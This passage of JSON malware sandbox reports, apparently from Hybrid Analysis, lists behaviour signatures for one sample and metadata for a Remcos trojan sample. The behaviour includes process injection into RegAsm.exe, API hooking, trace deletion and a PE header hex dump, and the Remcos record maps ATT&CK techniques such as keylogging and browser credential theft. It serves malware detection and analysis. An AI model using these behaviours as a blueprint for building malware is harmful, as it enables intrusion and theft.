"malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe\" (Handle: 2196)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe\" (Handle: 2196)\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Webdevelop\\Webfrequency.exe\" (Handle: 2196)\n \"Webfrequency.exe\" wrote 1500 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)\n \"Webfrequency.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)\n \"Webfrequency.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)\n \"Webfrequency.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)\n \"Webfrequency.exe\" wrote 512 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)\n \"Webfrequency.exe\" wrote 327680 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)\n \"Webfrequency.exe\" wrote 1536 bytes to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" (Handle: 1792)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"Webfrequency.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" - (UID: 00000000-00001812)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-42", "type": 6, "relevance": 7, "name": "Tries to hide tracks of having downloaded a file from the internet", "description": "\"RegAsm.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"Webfrequency.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300613bef5b0000000000000000e00002010b010b00000005000008000000000000ce1e0500002000000020050000004000002000000002000004000000000000000400000000000000006005000002000000000000020040850000100000100000000010000010000000000000100000000000000000000000781e05005300000000200500da04000000000000000000000000000000000000004005000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000d4fe0400002000000000050000020000000000000000000000000000200000602e72737263000000da040000002005000006000000020500000000000000000000000000400000402e72656c6f6300000c0000000040050000020000000805000000000000000000000000004000004200000000000000000000000000000000\") to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-134", "type": 6, "relevance": 10, "name": "Creates a system process in suspended mode (likely for process injection)", "description": "\"Webfrequency.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe\" - (UID: 00000000-00001812)", "origin": "API Call", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"Webfrequency.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"Webfrequency.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"Webfrequency.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"Webfrequency.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"Webfrequency.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2
https://hybrid-analysis.com/sample/dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2
Hybrid Analysis - Remcos
{"size": 498176, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2", "sha256": "dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2", "av_detect": 88, "vx_family": "Trojan.Remcos", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 1, "total_signatures": 179, "extracted_files": [{"name": "registros.dat", "file_size": 192, "sha256": "06309e6ed5532c65640cfbe7af7f2df83bf8d10522e6cb0358ab0f4b0ec29079", "type_tags": ["data"], "description": "data", "runtime_process": "dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe (PID: 5976)", "threat_level_readable": "no specific threat"}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27053)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27053)"], "imported_objects": ["27 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 327}, "processes": [{"uid": "00000000-00005976", "name": "dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe", "normalized_path": "C:\\dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe", "sha256": "dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1021.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/001", "informative_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": 